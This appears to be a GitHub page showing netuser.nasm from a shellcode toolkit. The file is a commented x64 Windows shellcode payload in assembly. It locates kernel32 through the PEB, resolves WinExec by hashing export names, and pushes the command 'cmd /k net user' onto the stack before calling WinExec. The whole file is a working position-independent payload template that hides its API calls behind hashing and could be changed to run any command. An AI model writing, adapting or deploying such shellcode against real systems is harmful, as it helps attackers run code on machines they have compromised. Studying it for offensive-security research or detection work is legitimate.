shencode/netuser.nasm at main · psycore8/shencode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166

            bits 64
            section .text
                global _start

            _start:

                push rbp
                mov rbp, rsp
                sub rsp, 40h
                xor r11, r11

                ; ### reserve memory for local variables ###
                ; 08h: Number of functions
                ; 10h: Address table
                ; 18h: Name pointer table
                ; 20h: Ordinal table
                ; 28h: not used (pointer to WinExec string)
                ; 30h: not used (address to WinExec function)
                ; 38h: reserved
                mov [rbp - 08h], r11
                mov [rbp - 10h], r11
                mov [rbp - 18h], r11
                mov [rbp - 20h], r11
                mov [rbp - 28h], r11
                mov [rbp - 30h], r11
                mov [rbp - 38h], r11

                ; ### find kernel32.dll base ###
                ; peb           = gs + 60h
                ; ldr           = peb + 18h
                ; ModuleList    = ldr + 20h
                ; ModuleList    -> Process
                ; ModuleList    -> NTDLL
                ; ModuleList    -> KERNEL32 + 20h
                ; kernel32 base -> rbx
                mov r11, gs:[r11 + 60h]
                mov r11, [r11 + 18h]
                mov r11, [r11 + 20h]
                mov r8, [r11]
                mov r11, [r8]
                mov r11, [r11 + 20h]
                mov r8, r11

                ; ### find export table ###
                ; base + 0x3c               = RVA PE Signature
                ; RVA PE Signature + base   = VA PE Signature
                ; VA PE Signature + 0x88    = RVA Export Table
                ; RVA Export Table          -> rax
                ; RVA Export Table + base   = VA Export Table

                sub rax, rax
                mov r11d, [r8 + 0x3c]
                add r11, r8
                mov al, 88h
                mov r11d, [r11 + rax]
                add r11, r8

                ; ### extract data and save in local variables ###
                ; Export Table + 0x14           = Number of Functions
                ; Export Table + 0x1c           = RVA Address Table
                ; Export table + 0x20           = RVA Name Pointer Table
                ; Export Table + 0x24           = RVA Ordinal Table
                ; RVA Address Table + Base      = VA Address Table
                ; RVA Name Pointer Table + Base = VA Name Pointer Table
                ; RVA Ordinal Table + Base      = VA Ordinal Table

                mov eax, [r11 + 0x14]
                mov [rbp - 8h], rax
                mov eax, [r11 + 0x1c]
                add rax, r8
                mov [rbp - 10h], rax
                mov eax, [r11 + 0x20]
                add rax, r8
                mov [rbp - 18h], rax
                mov eax, [r11 + 0x24]
                add rax, r8
                mov [rbp - 20h], rax

                mov r11, 0xFFFFFFFFFFFFFFFF
                add r11, 1
                sub rax, rax
                mov eax, [rbp - 8h]
                mov r10, [rbp - 18h]

            findFuncPos:
                xor rbx, rbx
                mov r11d, [rbp - 8h]
                sub r11d, eax
                mov edx, [r10]
                add rdx, r8

            HashLoop:
                mov rdi, 0xFFFFFFFFFFFFFFFF
                add rdi, 1
                mov dil, [rdx]
                test dil, dil
                jz HashCompare
                rol ebx, 162
                add ebx, edi
                inc rdx
                jmp HashLoop

            HashCompare:
                cmp ebx, 0x79cb7
                je WinExecFound

                add r10, 4
                lea rax, [rax - 1]
                ;cmp rax, 0
                test rax, rax
                ;jnz findFuncPos
                jnz findFuncPos
                jmp exit

            WinExecFound:
                ; load ordinal_table
                ; load address_table
                ; calculate WinExec ordinal
                ; calculate WinExec RVA
                ; calculate WinExec VA
                ; move WinExec VA into rax
                mov rax, [rbp - 20h]
                mov rdi, [rbp - 10h]
                mov ax, [rax + r11 * 2]
                mov r11d, [rdi + r11 * 4]
                add r11, r8
                mov rax, r11

            InvokeWinExec:
                xor rcx, rcx
                xor rdx, rdx
                push rcx
                ; begin stacked_command
                mov rcx, 0x1172657375207465            ; et user
                shl rcx, 8
                shr rcx, 8
                push rcx
                mov rcx, 0x6e206b2f20646d63            ; cmd /k n
                push rcx
                ; end stacked_command

                ; rcx = command
                ; uCmdSHow = SW_SHOWDEFAULT
                ; 16-byte Stack Alignment
                ; STACK + 32 Bytes (shadow spaces)
                ; call WinExec
                mov rcx, rsp
                mov dl, 0x1
                and rsp, -16
                sub rsp, 32
                call rax

                ; clear stack
                ; local variables
                ; pushes for ebp and WinExec
                ; pushes for WinExec invokation
                add rsp, 38h
                add rsp, 18h
                add rsp, 8h
                pop rbp
                ret

            exit:
                ret